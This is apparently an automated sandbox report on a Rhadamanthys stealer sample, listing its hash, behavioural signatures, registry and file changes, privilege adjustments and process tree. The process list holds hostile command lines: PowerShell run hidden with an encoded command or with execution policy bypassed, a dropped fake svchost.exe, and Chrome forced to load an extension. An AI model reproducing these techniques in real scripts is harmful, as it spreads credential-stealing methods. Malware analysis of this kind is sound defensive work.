Malware Analysis Report

2025-06-15 19:48

Sample ID 240209-vtts9adb5v
Target setup.exe
SHA256 6ac07ce849ad258cf9b47ca9767badc6ee867962cdcbe470cbe0d02ddb7437e8
Tags rhadamanthys stealer
Score 10/10

Analysis Overview

Threat Level: Known bad

The file setup.exe was found to be: Known bad.

Malicious Activity Summary

rhadamanthys stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-09 17:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-09 17:17

Reported

2024-02-09 17:47

Platform

win11-20231215-en

Max time kernel

939s

Max time network

1168s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3940 created 2824 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\sihost.exe

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\D: C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3164 set thread context of 3940 N/A C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIAEEF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAF40.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICC6E.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFD6AC3EC2F0BB8290.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File created C:\Windows\Installer\e57acf9.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAE22.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{32889C47-8C9B-4281-A3AD-9D1BCBCC1C09} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57acfd.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFB03D393F9EA60AD8.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57acf9.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFE05CB3B5DCC967EF.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFB6A9AC84057EB145.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAECF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAF00.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAF20.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID25B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setupact.log C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\System32\oobe\UserOOBEBroker.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133519726848393191" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2496 wrote to memory of 3304 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1420 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Windows\SysWOW64\msiexec.exe
PID 2496 wrote to memory of 4696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4696 wrote to memory of 2556 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 960 wrote to memory of 3056 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 3052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 4900 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B679B08DEE859E7BF68230C84A800740 C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707258448 " AI_EUIMSI=""

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 74F892A0B540A5F6AEE19F1BF7837B4F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssAF9C.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiAF99.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrAF9A.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrAF9B.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd1f0b9758,0x7ffd1f0b9768,0x7ffd1f0b9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1356 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2184 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3180 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3160 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4520 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe

"C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e [encoded command omitted]

C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3940 -ip 3940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3940 -ip 3940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3940 -ip 3940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2388

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Local\Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd0c8b9758,0x7ffd0c8b9768,0x7ffd0c8b9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3208 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3176 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1868 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4624 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4860 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5576 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5744 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5688 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3316 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3396 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

